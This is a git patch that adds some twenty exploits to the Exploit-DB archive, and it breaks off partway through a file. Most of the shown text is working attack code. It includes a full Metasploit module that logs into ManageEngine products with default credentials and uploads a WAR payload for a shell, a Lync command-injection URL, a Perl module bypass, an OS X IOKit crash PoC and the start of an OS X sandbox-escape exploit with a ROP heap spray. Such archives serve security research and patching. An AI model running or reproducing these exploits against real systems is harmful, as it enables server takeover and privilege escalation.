From cdb1e00befebb28138d48923606c71a92f13c727 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 22 Jan 2015 08:36:41 +0000
Subject: [PATCH] Update: 2015-01-22

20 new exploits
---
 files.csv                          |  24 +-
 platforms/asp/webapps/35852.txt    |   9 +
 platforms/java/remote/35845.rb     | 437 +++++++++++++++++++++++++++++
 platforms/linux/remote/35836.pl    |  27 ++
 platforms/osx/dos/35849.c          |  46 +++
 platforms/osx/local/35847.c        | 185 ++++++++++++
 platforms/osx/local/35848.c        | 323 +++++++++++++++++++++
 platforms/php/remote/35855.txt     |  41 +++
 platforms/php/webapps/35835.txt    |   8 +
 platforms/php/webapps/35837.html   |  22 ++
 platforms/php/webapps/35838.txt    |   7 +
 platforms/php/webapps/35839.txt    |   9 +
 platforms/php/webapps/35840.txt    |  62 ++++
 platforms/php/webapps/35846.txt    | 118 ++++++++
 platforms/php/webapps/35851.txt    |  12 +
 platforms/php/webapps/35853.php    |  57 ++++
 platforms/php/webapps/35854.pl     |  49 ++++
 platforms/windows/dos/35842.c      |  71 +++++
 platforms/windows/local/35821.txt  | 135 +++++++++
 platforms/windows/local/35850.bat  |  31 ++
 platforms/windows/remote/35841.txt |  31 ++
 21 files changed, 1702 insertions(+), 2 deletions(-)
 create mode 100755 platforms/asp/webapps/35852.txt
 create mode 100755 platforms/java/remote/35845.rb
 create mode 100755 platforms/linux/remote/35836.pl
 create mode 100755 platforms/osx/dos/35849.c
 create mode 100755 platforms/osx/local/35847.c
 create mode 100755 platforms/osx/local/35848.c
 create mode 100755 platforms/php/remote/35855.txt
 create mode 100755 platforms/php/webapps/35835.txt
 create mode 100755 platforms/php/webapps/35837.html
 create mode 100755 platforms/php/webapps/35838.txt
 create mode 100755 platforms/php/webapps/35839.txt
 create mode 100755 platforms/php/webapps/35840.txt
 create mode 100755 platforms/php/webapps/35846.txt
 create mode 100755 platforms/php/webapps/35851.txt
 create mode 100755 platforms/php/webapps/35853.php
 create mode 100755 platforms/php/webapps/35854.pl
 create mode 100755 platforms/windows/dos/35842.c
 create mode 100755 platforms/windows/local/35821.txt
 create mode 100755 platforms/windows/local/35850.bat
 create mode 100755 platforms/windows/remote/35841.txt

diff --git a/files.csv b/files.csv
index f9d51d7eb..63a147a2f 100755
--- a/files.csv
+++ b/files.csv
@@ -27253,7 +27253,7 @@ id,file,description,date,author,platform,type,port
 30401,platforms/php/dos/30401.php,"T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability",2007-07-26,r0ut3r,php,dos,0
 30402,platforms/asp/webapps/30402.txt,"Nukedit 4.9.x Login.ASP Cross-Site Scripting Vulnerability",2007-07-26,d3hydr8,asp,webapps,0
 30403,platforms/php/webapps/30403.txt,"WordPress WP-FeedStats 2.1 HTML Injection Vulnerability",2007-07-26,"David Kierznowski",php,webapps,0
-30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,"Parvez Anwar",windows,remote,0
+30404,platforms/windows/remote/30404.html,"Yahoo! Widgets Engine 4.0.3 YDPCTL.DLL ActiveX Control Buffer Overflow Vulnerability",2007-07-27,Unknown,windows,remote,0
 30405,platforms/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",php,webapps,0
 30408,platforms/php/webapps/30408.txt,"Jenkins 1.523 - Inject Persistent HTML Code",2013-12-18,"Christian Catalano",php,webapps,0
 30409,platforms/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",php,webapps,0
@@ -27391,7 +27391,7 @@ id,file,description,date,author,platform,type,port
 30558,platforms/php/webapps/30558.txt,"Claroline 1.x admin/advancedUserSearch.php action Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
 30559,platforms/php/webapps/30559.txt,"Claroline 1.x admin/campusProblem.php view Parameter XSS",2007-09-03,"Fernando Munoz",php,webapps,0
 30560,platforms/php/webapps/30560.txt,"212cafe Webboard 6.30 Read.PHP SQL Injection Vulnerability",2007-09-04,"Lopez Bran Digrap",php,webapps,0
-30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,"Parvez Anwar",windows,remote,0
+30562,platforms/windows/remote/30562.html,"Move Media Player 1.0 Quantum Streaming ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-09-04,Unknown,windows,remote,0
 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat <= 5.5.15 Cal2.JSP Cross-Site Scripting Vulnerability",2007-09-04,"Tushar Vartak",jsp,webapps,0
 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 Login.ASP SQL Injection Vulnerability",2007-09-04,SmOk3,asp,webapps,0
 30565,platforms/windows/remote/30565.pl,"AkkyWareHOUSE 7-zip32.dll 4.42 Heap-Based Buffer Overflow Vulnerability",2007-09-04,miyy3t,windows,remote,0
@@ -32274,6 +32274,7 @@ id,file,description,date,author,platform,type,port
 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 'expand' Parameter Cross Site Scripting Vulnerability",2011-06-01,"Stefan Schurtz",multiple,remote,0
 35819,platforms/php/webapps/35819.txt,"Ushahidi 2.0.1 'range' Parameter SQL Injection Vulnerability",2011-06-02,"Gjoko Krstic",php,webapps,0
 35820,platforms/linux/dos/35820.c,"Linux Kernel 2.6.x KSM Local Denial of Service Vulnerability",2011-06-02,"Andrea Righi",linux,dos,0
+35821,platforms/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",windows,local,0
 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
 35824,platforms/php/webapps/35824.txt,"vBulletin vBExperience 3 'sortorder' Parameter Cross Site Scripting Vulnerability",2011-06-06,Mr.ThieF,php,webapps,0
 35826,platforms/php/webapps/35826.txt,"Joomla CCBoard SQL Injection and Arbitrary File Upload Vulnerabilities",2011-06-06,KedAns-Dz,php,webapps,0
@@ -32283,3 +32284,22 @@ id,file,description,date,author,platform,type,port
 35832,platforms/php/webapps/35832.txt,"Squiz Matrix 4 'colour_picker.php' Cross Site Scripting Vulnerability",2011-06-06,"Patrick Webster",php,webapps,0
 35833,platforms/php/webapps/35833.txt,"Xataface 1.x 'action' Parameter Local File Include Vulnerability",2011-06-07,ITSecTeam,php,webapps,0
 35834,platforms/php/webapps/35834.txt,"BLOG:CMS 4.2 Multiple Cross Site Scripting Vulnerabilities",2011-06-07,"Stefan Schurtz",php,webapps,0
+35835,platforms/php/webapps/35835.txt,"WordPress GD Star Rating Plugin 'votes' Parameter SQL Injection Vulnerability",2011-06-08,anonymous,php,webapps,0
+35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module 'results()' Security Bypass Vulnerability",2011-06-08,dst,linux,remote,0
+35837,platforms/php/webapps/35837.html,"The Pacer Edition CMS 2.1 'email' Parameter Cross Site Scripting Vulnerability",2011-06-07,LiquidWorm,php,webapps,0
+35838,platforms/php/webapps/35838.txt,"Tolinet Agencia 'id' Parameter SQL Injection Vulnerability",2011-06-10,"Andrea Bocchetti",php,webapps,0
+35839,platforms/php/webapps/35839.txt,"Joomla Minitek FAQ Book 1.3 'id' Parameter SQL Injection Vulnerability",2011-06-13,kaMtiEz,php,webapps,0
+35840,platforms/php/webapps/35840.txt,"RedaxScript 2.1.0 - Privilege Escalation",2015-01-20,"shyamkumar somana",php,webapps,80
+35841,platforms/windows/remote/35841.txt,"Bsplayer 2.68 - HTTP Response Buffer Overflow",2015-01-20,"Fady Mohammed Osman",windows,remote,0
+35842,platforms/windows/dos/35842.c,"MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS",2015-01-20,"Parvez Anwar",windows,dos,0
+35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,metasploit,java,remote,8080
+35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
+35847,platforms/osx/local/35847.c,"OS X networkd ""effective_audit_token"" XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
+35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
+35849,platforms/osx/dos/35849.c,"OS X 10.10 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0
+35850,platforms/windows/local/35850.bat,"Microsoft Windows XP 'tskill' Local Privilege Escalation Vulnerability",2011-06-13,"Todor Donev",windows,local,0
+35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 'user' and 'pass' SQL Injection Vulnerabilities",2011-06-13,pentesters.ir,php,webapps,0
+35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 'ReachJoin.aspx' Remote Command Injection Vulnerability",2011-06-13,"Mark Lachniet",asp,webapps,0
+35853,platforms/php/webapps/35853.php,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (1)",2011-06-13,pentesters.ir,php,webapps,0
+35854,platforms/php/webapps/35854.pl,"Phpnuke 8.3 'upload.php' Arbitrary File Upload Vulnerability (2)",2011-06-13,pentesters.ir,php,webapps,0
+35855,platforms/php/remote/35855.txt,"PHP <= 5.3.6 Security Bypass Vulnerability",2011-06-14,"Krzysztof Kotowicz",php,remote,0
diff --git a/platforms/asp/webapps/35852.txt b/platforms/asp/webapps/35852.txt
new file mode 100755
index 000000000..c193f581d
--- /dev/null
+++ b/platforms/asp/webapps/35852.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/48235/info
+
+Microsoft Lync Server 2010 is prone to a remote command-injection vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary commands in the context of the application.
+
+Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected. 
+
+https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29// 
\ No newline at end of file
diff --git a/platforms/java/remote/35845.rb b/platforms/java/remote/35845.rb
new file mode 100755
index 000000000..def52460a
--- /dev/null
+++ b/platforms/java/remote/35845.rb
@@ -0,0 +1,437 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'          => 'ManageEngine Multiple Products Authenticated File Upload',
+      'Description'   => %q{
+        This module exploits a directory traversal vulnerability in ManageEngine ServiceDesk,
+        AssetExplorer, SupportCenter and IT360 when uploading attachment files. The JSP that accepts
+        the upload does not handle correctly '../' sequences, which can be abused to write
+        in the file system. Authentication is needed to exploit this vulnerability, but this module
+        will attempt to login using the default credentials for the administrator and guest
+        accounts. Alternatively you can provide a pre-authenticated cookie or a username / password
+        combo. For IT360 targets enter the RPORT of the ServiceDesk instance (usually 8400). All
+        versions of ServiceDesk prior v9 build 9031 (including MSP but excluding v4), AssetExplorer,
+        SupportCenter and IT360 (including MSP) are vulnerable. At the time of release of this
+        module, only ServiceDesk v9 has been fixed in build 9031 and above. This module has been
+        been tested successfully in Windows and Linux on several versions.
+      },
+      'Author'        =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability Discovery and Metasploit module
+        ],
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          ['CVE', '2014-5301'],
+          ['OSVDB', '116733'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_sd_file_upload.txt'],
+          ['URL', 'http://seclists.org/fulldisclosure/2015/Jan/5']
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 30 },
+      'Privileged'     => false, # Privileged on Windows but not on Linux targets
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+          [ 'ServiceDesk Plus v5-v7.1 < b7016/AssetExplorer v4/SupportCenter v5-v7.9',
+            {
+              'attachment_path' => '/workorder/Attachment.jsp'
+            }
+          ],
+          [ 'ServiceDesk Plus/Plus MSP v7.1 >= b7016 - v9.0 < b9031/AssetExplorer v5-v6.1',
+            {
+              'attachment_path' => '/common/FileAttachment.jsp'
+            }
+          ],
+          [ 'IT360 v8-v10.4',
+            {
+              'attachment_path' => '/common/FileAttachment.jsp'
+            }
+          ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 15 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('JSESSIONID',
+          [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
+        OptString.new('IAMAGENTTICKET',
+          [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
+        OptString.new('USERNAME',
+          [true, 'The username to login as', 'guest']),
+        OptString.new('PASSWORD',
+          [true, 'Password for the specified username', 'guest']),
+        OptString.new('DOMAIN_NAME',
+          [false, 'Name of the domain to logon to'])
+      ], self.class)
+  end
+
+
+  def get_version
+    res = send_request_cgi({
+      'uri'    => '/',
+      'method' => 'GET'
+    })
+
+    # Major version, minor version, build and product (sd = servicedesk; ae = assetexplorer; sc = supportcenterl; it = it360)
+    version = [ 9999, 9999, 0, 'sd' ]
+
+    if res && res.code == 200
+      if res.body.to_s =~ /ManageEngine ServiceDesk/
+        if res.body.to_s =~ /&nbsp;&nbsp;\|&nbsp;&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/
+          output = $1
+          version = [output[0].to_i, output[2].to_i, '0', 'sd']
+        end
+        if res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/     # newer builds
+          version[2] = $1.to_i
+        elsif res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/   # older builds
+          version[2] = $1.to_i
+        end
+      elsif res.body.to_s =~ /ManageEngine AssetExplorer/
+        if res.body.to_s =~ /ManageEngine AssetExplorer &nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)/ ||
+            res.body.to_s =~ /<div class="login-versioninfo">version&nbsp;([0-9]{1}\.{1}[0-9]{1}\.?[0-9]*)<\/div>/
+          output = $1
+          version = [output[0].to_i, output[2].to_i, 0, 'ae']
+        end
+        if res.body.to_s =~ /src="\/scripts\/ClientLogger\.js\?([0-9]+)"><\/script>/
+          version[2] = $1.to_i
+        end
+      elsif res.body.to_s =~ /ManageEngine SupportCenter Plus/
+        # All of the vulnerable sc installations are "old style", so we don't care about the major / minor version
+        version[3] = 'sc'
+        if res.body.to_s =~ /'\/style\/style\.css', '([0-9]+)'\);<\/script>/
+          # ... but get the build number if we can find it
+          version[2] = $1.to_i
+        end
+      elsif res.body.to_s =~ /\/console\/ConsoleMain\.cc/
+        # IT360 newer versions
+        version[3] = 'it'
+      end
+    elsif res && res.code == 302 && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
+      # IT360 older versions, not a very good detection string but there is no alternative?
+      version[3] = 'it'
+    end
+
+    version
+  end
+
+
+  def check
+    version = get_version
+    # TODO: put fixed version on the two ifs below once (if...) products are fixed
+    # sd was fixed on build 9031
+    # ae and sc still not fixed
+    if (version[0] <= 9 && version[0] > 4 && version[2] < 9031 && version[3] == 'sd') ||
+    (version[0] <= 6 && version[2] < 99999 && version[3] == 'ae') ||
+    (version[3] == 'sc' && version[2] < 99999)
+      return Exploit::CheckCode::Appears
+    end
+
+    if (version[2] > 9030 && version[3] == 'sd') ||
+        (version[2] > 99999 && version[3] == 'ae') ||
+        (version[2] > 99999 && version[3] == 'sc')
+      return Exploit::CheckCode::Safe
+    else
+      # An IT360 check always lands here, there is no way to get the version easily
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
+
+  def authenticate_it360(port, path, username, password)
+    if datastore['DOMAIN_NAME'] == nil
+      vars_post = {
+        'LOGIN_ID' => username,
+        'PASSWORD' => password,
+        'isADEnabled' => 'false'
+      }
+    else
+      vars_post = {
+        'LOGIN_ID' => username,
+        'PASSWORD' => password,
+        'isADEnabled' => 'true',
+        'domainName' => datastore['DOMAIN_NAME']
+      }
+    end
+
+    res = send_request_cgi({
+      'rport'  => port,
+      'method' => 'POST',
+      'uri'    => normalize_uri(path),
+      'vars_get' => {
+        'service'   => 'ServiceDesk',
+        'furl'      => '/',
+        'timestamp' => Time.now.to_i
+      },
+      'vars_post' => vars_post
+    })
+
+    if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
+      # /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
+      return res.get_cookies
+    else
+      return nil
+    end
+  end
+
+
+  def get_it360_cookie_name
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri("/")
+    })
+    cookie = res.get_cookies
+    if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
+      return $1
+    else
+      return nil
+    end
+  end
+
+
+  def login_it360
+    # Do we already have a valid cookie? If yes, just return that.
+    if datastore['IAMAGENTTICKET']
+      cookie_name = get_it360_cookie_name
+      cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
+      return cookie
+    end
+
+    # get the correct path, host and port
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/')
+    })
+
+    if res && res.redirect?
+      uri = [ res.redirection.port, res.redirection.path ]
+    else
+      return nil
+    end
+
+    cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
+
+    if cookie != nil
+      return cookie
+    elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
+      # we've tried with the default guest password, now let's try with the default admin password
+      cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
+      if cookie != nil
+        return cookie
+      else
+        # Try one more time with the default admin login for some versions
+        cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
+        if cookie != nil
+          return cookie
+        end
+      end
+    end
+
+    nil
+  end
+
+
+  #
+  # Authenticate and validate our session cookie. We need to submit credentials to
+  # j_security_check and then follow the redirect to HomePage.do to create a valid
+  # authenticated session.
+  #
+  def authenticate(cookie, username, password)
+    res = send_request_cgi!({
+      'method' => 'POST',
+      'uri' => normalize_uri('/j_security_check;' + cookie.to_s.gsub(';', '')),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'cookie' => cookie,
+      'vars_post' => {
+        'j_username' => username,
+        'j_password' => password,
+        'logonDomainName' => datastore['DOMAIN_NAME']
+      }
+    })
+    if res && (res.code == 302 || (res.code == 200 && res.body.to_s =~ /redirectTo="\+'HomePage\.do';/))
+      # sd and ae respond with 302 while sc responds with a 200
+      return true
+    else
+      return false
+    end
+  end
+
+
+  def login
+    # Do we already have a valid cookie? If yes, just return that.
+    if datastore['JSESSIONID'] != nil
+      cookie = 'JSESSIONID=' + datastore['JSESSIONID'].to_s + ';'
+      return cookie
+    end
+
+    # First we get a valid JSESSIONID to pass to authenticate()
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('/')
+    })
+    if res && res.code == 200
+      cookie = res.get_cookies
+      authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
+      if authenticated
+        return cookie
+      elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
+        # we've tried with the default guest password, now let's try with the default admin password
+        authenticated = authenticate(cookie, 'administrator', 'administrator')
+        if authenticated
+          return cookie
+        else
+          # Try one more time with the default admin login for some versions
+          authenticated = authenticate(cookie, 'admin', 'admin')
+          if authenticated
+            return cookie
+          end
+        end
+      end
+    end
+
+    nil
+  end
+
+
+  def send_multipart_request(cookie, payload_name, payload_str)
+    if payload_name =~ /\.ear/
+      upload_path = '../../server/default/deploy'
+    else
+      upload_path = rand_text_alpha(4+rand(4))
+    end
+
+    post_data = Rex::MIME::Message.new
+
+    if @my_target == targets[1]
+      # old style
+      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
+      post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
+      post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
+      post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
+      post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
+    else
+      post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
+      post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
+      post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
+    end
+
+    data = post_data.to_s
+    res = send_request_cgi({
+      'uri' => normalize_uri(@my_target['attachment_path']),
+      'method' => 'POST',
+      'data' => data,
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => cookie
+    })
+    return res
+  end
+
+
+  def pick_target
+    return target if target.name != 'Automatic'
+
+    version = get_version
+    if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
+    (version[0] == 4 && version[3] == 'ae') ||
+    (version[3] == 'sc')
+      # These are all "old style" versions (sc is always old style)
+      return targets[1]
+    elsif version[3] == 'it'
+      return targets[3]
+    else
+      return targets[2]
+    end
+  end
+
+
+  def exploit
+    if check == Exploit::CheckCode::Safe
+      fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
+    end
+
+    print_status("#{peer} - Selecting target...")
+    @my_target = pick_target
+    print_status("#{peer} - Selected target #{@my_target.name}")
+
+    if @my_target == targets[3]
+      cookie = login_it360
+    else
+      cookie = login
+    end
+
+    if cookie.nil?
+      fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
+    end
+
+    # First we generate the WAR with the payload...
+    war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    war_payload = payload.encoded_war({ :app_name => war_app_base })
+
+    # ... and then we create an EAR file that will contain it.
+    ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
+    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    app_xml << '<application>'
+    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
+    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
+    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
+
+    # Zipping with CM_STORE to avoid errors while decompressing the zip
+    # in the Java vulnerable application
+    ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    ear_file.add_file(war_app_base + '.war', war_payload.to_s)
+    ear_file.add_file('META-INF/application.xml', app_xml)
+    ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
+
+    if @my_target != targets[3]
+      # Linux doesn't like it when we traverse non existing directories,
+      # so let's create them by sending some random data before the EAR.
+      # (IT360 does not have a Linux version so we skip the bogus file for it)
+      print_status("#{peer} - Uploading bogus file...")
+      res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
+      if res && res.code != 200
+        fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
+      end
+    end
+
+    # Now send the actual payload
+    print_status("#{peer} - Uploading EAR file...")
+    res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful")
+    else
+      fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
+    end
+
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
+  end
+end
\ No newline at end of file
diff --git a/platforms/linux/remote/35836.pl b/platforms/linux/remote/35836.pl
new file mode 100755
index 000000000..b3c9ac5b4
--- /dev/null
+++ b/platforms/linux/remote/35836.pl
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/48167/info
+
+The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
+
+Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
+
+#!/opt/perl/5.12/bin/perl
+
+use strict;
+use warnings;
+
+use Data::FormValidator;
+
+"some_unrelated_string" =~ m/^.*$/;
+
+my $profile = {
+untaint_all_constraints => 1,
+required => [qw(a)],
+constraint_methods => {
+a => qr/will_never_match/,
+},
+};
+
+my $results = Data::FormValidator->check({ a => 1 }, $profile);
+warn $results->valid('a');
diff --git a/platforms/osx/dos/35849.c b/platforms/osx/dos/35849.c
new file mode 100755
index 000000000..cf742c6e4
--- /dev/null
+++ b/platforms/osx/dos/35849.c
@@ -0,0 +1,46 @@
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <IOKit/IOKitLib.h>
+
+int main(){
+  kern_return_t err;
+
+  CFMutableDictionaryRef matching = IOServiceMatching("IntelAccelerator");
+  if(!matching){
+    printf("unable to create service matching dictionary\n");
+    return 0;
+  }
+
+  io_iterator_t iterator;
+  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
+  if (err != KERN_SUCCESS){
+    printf("no matches\n");
+    return 0;
+  }
+
+  io_service_t service = IOIteratorNext(iterator);
+
+  if (service == IO_OBJECT_NULL){
+    printf("unable to find service\n");
+    return 0;
+  }
+  printf("got service: %x\n", service);
+
+  io_connect_t conn = MACH_PORT_NULL;
+  err = IOServiceOpen(service, mach_task_self(), 2, &conn);
+  if (err != KERN_SUCCESS){
+    printf("unable to get user client connection\n");
+    return 0;
+  }else{
+    printf("got userclient connection: %x\n", conn);
+  }
+
+  mach_vm_address_t addr = 0x414100000000;
+  mach_vm_size_t size = 0x1000;
+
+  err = IOConnectMapMemory(conn, 3, mach_task_self(), &addr, &size, kIOMapAnywhere);
+  return 0;
+}
diff --git a/platforms/osx/local/35847.c b/platforms/osx/local/35847.c
new file mode 100755
index 000000000..96ec1a58a
--- /dev/null
+++ b/platforms/osx/local/35847.c
@@ -0,0 +1,185 @@
+// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
+// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
+// ianbeer
+#include <dlfcn.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+
+#include <xpc/xpc.h>
+#include <CoreFoundation/CoreFoundation.h>
+
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+#include <mach/task.h>
+
+#include <mach-o/dyld_images.h>
+
+#include "liblorgnette/lorgnette.h"
+
+/* find the base address of CoreFoundation for the ROP gadgets */
+
+void* find_library_load_address(const char* library_name){
+  kern_return_t err;
+
+  // get the list of all loaded modules from dyld
+  // the task_info mach API will get the address of the dyld all_image_info struct for the given task
+  // from which we can get the names and load addresses of all modules
+  task_dyld_info_data_t task_dyld_info;
+  mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
+  err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
+
+  const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
+  const struct dyld_image_info* image_infos = all_image_infos->infoArray;
+  
+  for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
+    const char* image_name = image_infos[i].imageFilePath;
+    mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
+    if (strstr(image_name, library_name)){
+      return (void*)image_load_address;
+    }
+  }
+  return NULL;
+}
+
+
+struct heap_spray {
+  void* fake_objc_class_ptr; // -------+
+  uint8_t pad0[0x10];        //        |
+  uint64_t first_gadget;     //        |
+  uint8_t pad1[0x8];         //        |
+  uint64_t null0;            //        |
+  uint64_t pad3;             //        |
+  uint64_t pop_rdi_rbp_ret;  //        |
+  uint64_t rdi;              //        |
+  uint64_t rbp;              //        |
+  uint64_t system;           //        |
+  struct fake_objc_class_t { //        |
+    char pad[0x10];      // <----------+
+    void* cache_buckets_ptr; //--------+
+    uint64_t cache_bucket_mask;  //    |
+  } fake_objc_class;             //    |
+  struct fake_cache_bucket_t {   //    |
+    void* cached_sel;      // <--------+  //point to the right selector
+    void* cached_function; // will be RIP :)
+  } fake_cache_bucket;
+  char command[256];
+};
+
+xpc_connection_t connect(){
+  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+
